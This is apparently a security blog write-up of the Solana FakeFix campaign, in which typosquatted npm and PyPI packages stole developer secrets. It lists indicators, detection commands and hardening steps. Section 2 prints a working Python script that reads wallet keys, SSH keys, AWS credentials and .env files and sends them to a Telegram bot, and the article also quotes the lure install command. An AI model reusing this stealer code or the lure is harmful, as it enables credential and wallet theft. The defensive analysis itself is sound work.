Solana FakeFix: 25 Malicious npm and PyPI Packages Lure Developers With Fake Stable Builds + Video

Listen to this Post

🐢▶️ Listen🚀

Introduction

A sophisticated supply-chain threat known as the Solana FakeFix campaign recently deployed 25 malicious packages across the npm and PyPI ecosystems, impersonating Solana SDK tooling to steal developer secrets. By exploiting install-time execution hooks and typosquatting strategies, attackers harvested Solana wallet keys, cloud credentials, SSH keys, GitHub tokens, AWS keys, environment variables, and system secrets from compromised developer environments.

Learning Objectives

• Analyze the Solana FakeFix campaign’s attack vectors, including typosquatting, fake stable‑build fixes, and lifecycle execution.
• Identify, detect, and remove the malicious npm and PyPI packages used in the campaign.
• Implement defensive strategies such as lockfile pinning, dependency cooldowns, sandboxing, and credential rotation to safeguard developer workstations and CI/CD pipelines.

You Should Know

1. Why FakeFix Targets Solana Developers

Solana developers routinely search for SDKs, patched builds, community forks, and MEV tooling. The Solana FakeFix campaign exploited this by creating packages with names like @solana-labs/web3.js, @solana-labs/spl-toke, solana-web3-stable, and solana-rpc-client—names that are close enough to trusted Solana ecosystem terminology to attract developers seeking compatibility fixes. The attacker used the GitHub user PassWord1337 to open nine issues across different projects, presenting the malicious package as a community‑maintained drop‑in replacement for `@solana/web3.js` v2. The lure text suggested the following command:

npm uninstall @solana/web3.js && npm install @solana-labs/web3.js

Instead of advertising a random package, the attacker framed the malicious package as a practical compatibility fix for projects trying to stabilize their builds. The earliest npm variants used a `postinstall` lifecycle script (defined in `package.json` as { "scripts": { "postinstall": "node install.js" } }), which executed attacker‑controlled JavaScript immediately upon installation, without any import or runtime use of the library.

2. Step‑by‑step Analysis of the Malicious Payloads

The malicious npm payload (e.g., @solana-labs/web3.js) configured a Telegram command‑and‑control (C2) channel and searched the local system for developer secrets. The embedded Telegram bot token (8628389567:AAHeoLi034Vg6J...) and chat ID (8346336575) were used to exfiltrate the following files:

– `~/.config/solana/id.json`
– `~/.solana/id.json`
– `~/.ssh/id_rsa`
– `~/.ssh/id_ed25519`
– `~/.aws/credentials`
– `$(CWD)/.env`
– `$(CWD)/wallet.json`

The PyPI packages used a different trigger mechanism: the malicious logic was placed in __init__.py, meaning that a simple `import` statement could start collection and persistence. The three PyPI packages shared the same compact payload and used the bot token `8870595195:AAHcwv2ZMYZU9ia_xj…` with the same chat ID 8346336575. Below is a Python script that simulates the exfiltration logic for educational analysis:

import os
import requests

HOME = os.path.expanduser("~")
CWD = os.getcwd()

BOT_TOKEN = "8870595195:AAHcwv2ZMYZU9ia_xj..."
CHAT_ID = "8346336575"

target_files = [
os.path.join(HOME, ".config", "solana", "id.json"),
os.path.join(HOME, ".solana", "id.json"),
os.path.join(HOME, ".ssh", "id_rsa"),
os.path.join(HOME, ".ssh", "id_ed25519"),
os.path.join(HOME, ".aws", "credentials"),
os.path.join(CWD, ".env"),
os.path.join(CWD, "wallet.json")
]

def exfiltrate(file_path):
if os.path.exists(file_path):
with open(file_path, "r") as f:
content = f.read()
url = f"https://api.telegram.org/bot{BOT_TOKEN}/sendDocument"
files = {"document": (os.path.basename(file_path), content)}
requests.post(url, data={"chat_id": CHAT_ID}, files=files)

for target in target_files:
exfiltrate(target)

3. Indicators of Compromise (IoCs)

Telegram C2 bots and chat IDs:

• Bot token: `8628389567:AAHeoLi034Vg6J…` (npm)
• Bot token: `8870595195:AAHcwv2ZMYZU9ia_xj…` (PyPI)
• Chat ID: `8346336575`

Malicious npm packages (partial list):

– `@solana-labs/web3.js`
– `@solana-labs/spl-toke`
– `solana-web3-stable`
– `solana-rpc-client`
– `@async-mutex/mutex`
– `dexscreener`
– `solana-transaction-toolkit`
– `solana-stable-web-huks`

Malicious PyPI packages:

• Several packages impersonating Solana tooling and using the same Telegram exfiltration channel

4. Detection and Removal Commands

Windows PowerShell (detection)

 Check globally installed npm packages for Solana FakeFix IoCs
npm list -g --depth=0 | Select-String "solana-labs|solana-web3-stable|solana-rpc-client|async-mutex|dexscreener|solana-transaction-toolkit"

Check project‑level npm dependencies
Get-ChildItem -Path .\node_modules -Directory | Where-Object { $_.Name -match "solana-labs|solana-web3-stable|solana-rpc-client" }

List global pip packages (PyPI)
pip list --format=freeze | Select-String "solana"

Linux / macOS (detection and removal)

 Search global npm packages for malicious names
npm list -g --depth=0 | grep -E "(solana-labs|solana-web3-stable|solana-rpc-client|async-mutex|dexscreener|solana-transaction-toolkit)"

Search local node_modules
find node_modules -maxdepth 1 -type d | grep -E "(solana-labs|solana-web3-stable|solana-rpc-client)"

Remove a specific malicious npm package
npm uninstall -g @solana-labs/web3.js
npm uninstall solana-web3-stable

List all global PyPI packages and grep for malicious names
pip3 list | grep -i solana

Remove a malicious PyPI package
pip3 uninstall malicious-package-1ame -y

5. Hardening Development Environments Against Supply‑Chain Attacks

Given that the FakeFix campaign leverages install‑time execution hooks and freshly published malicious versions, developers should adopt the following countermeasures:

A. Use lockfiles and strict installation

• Always commit `package-lock.json` (npm) or `poetry.lock` (Python) to version control.
• In CI/CD, use `npm ci` instead of `npm install` to enforce exact versions from the lockfile.

B. Enable dependency cooldowns

A minimum release age of 24 hours would have blocked the FakeFix packages during their highest‑risk window.
– pnpm 11 enables a 24‑hour Minimum Release Age by default.
– Renovate and Dependabot support configurable cooldowns.
– PMG (Package Manager Guard) offers a configurable cooldown policy.

C. Install‑time package firewalls

• Supply‑Chain Firewall by Datadog (scfw run npm install) blocks known‑malicious PyPI and npm packages before they execute.
• Package Manager Guard (PMG) intercepHts `npm install` and pip install, checks against a real‑time threat intelligence feed, and can run installations inside OS‑native sandboxes (macOS Seatbelt, Linux Landlock).

D. Disable lifecycle scripts by default

For npm (globally or per project):

// .npmrc
ignore-scripts=true

For PyPI (using a virtual environment and skipping script execution):

python -m venv --without-pip venv
 Then manually validate and install packages with a scoped permission model

For pnpm (granular allow‑list for build scripts):

// .npmrc
allowBuilds=pattern1,pattern2

1. What to Do If You Are Already Compromised

1. Isolate the affected system(s) from the network.

1. Preserve logs – retain installation logs, shell history, and package manager caches for forensics.

3. Rotate all exposed credentials, including:

• Solana wallet keys (generate new keypairs and move funds)
• SSH keys (replace with new key pairs and update authorized_keys)
• AWS/GitHub API tokens and environment variables

1. Remove the malicious packages as detailed in section 4.
2. Rebuild developer machines and CI runners from trusted, clean images.
3. Review account activity for GitHub, cloud platforms, and wallet transactions.

7. Long‑Term Mitigation for Teams

Implement a software bill of materials (SBOM) and continuously monitor dependencies. Integrate malicious package detection into CI/CD pipelines using tools like SonarQube Advanced Security, which blocks builds when a confirmed malicious dependency is detected. Adopt packaging controls such as:
– Pinning dependency versions with lockfiles.
– Using pnpm with its hardened defaults (minimum release age, block exotic subdependencies, allow‑builds model).
– Running nightly scans of internal registries and mirrors for known IoCs.
– Educating developers to verify the authenticity of packages, prefer verified publishers, and avoid installing packages from external URLs or Git repositories without review.

What Undercode Say

• Key Takeaway 1 – Supply‑chain attacks are becoming increasingly sophisticated, moving beyond simple typosquatting to sophisticated social engineering (fake GitHub issues) and cross‑ecosystem deployment (npm and PyPI simultaneously).
• Key Takeaway 2 – The combination of install‑time execution hooks (postinstall, __init__.py) and short‑window publication strategies makes traditional reactive security insufficient; proactive, layered defenses (cooldowns, sandboxing, package firewalls) are now mandatory.

The FakeFix campaign illustrates that attackers are weaponizing the very trust and convenience that make open‑source ecosystems so powerful. For Solana developers – and indeed all developers – the era of “install first, audit later” is over. Every `npm install` or `pip install` must be treated as a potential security boundary. Defense in depth is no longer optional; it is the baseline.

Prediction

• -1 The proliferation of AI‑generated code recommendations may increase the attack surface, as developers may unknowingly accept malicious package suggestions from generative coding assistants.
• -1 Cross‑registry campaigns (npm, PyPI, Crates.io) will become the norm, making detection harder and requiring unified threat intelligence platforms across multiple ecosystems.
• +1 However, the response from the industry – including package manager hardening (pnpm 11), open‑source tools (PMG, Supply‑Chain Firewall), and CI/CD integration (SonarQube) – indicates a maturing defensive posture that could substantially reduce the success rate of such attacks within 12–18 months.
• -1 The growing financial incentive in stealing crypto wallet keys and cloud credentials ensures that threat actors will continue to evolve their techniques, possibly incorporating supply‑chain worm capabilities that automatically propagate malicious versions across a developer’s entire package publishing scope.

▶️ Related Video (80% Match):

🎯Let’s Practice For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

IT/Security Reporter URL:

Reported By: Varshu25 Solana – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky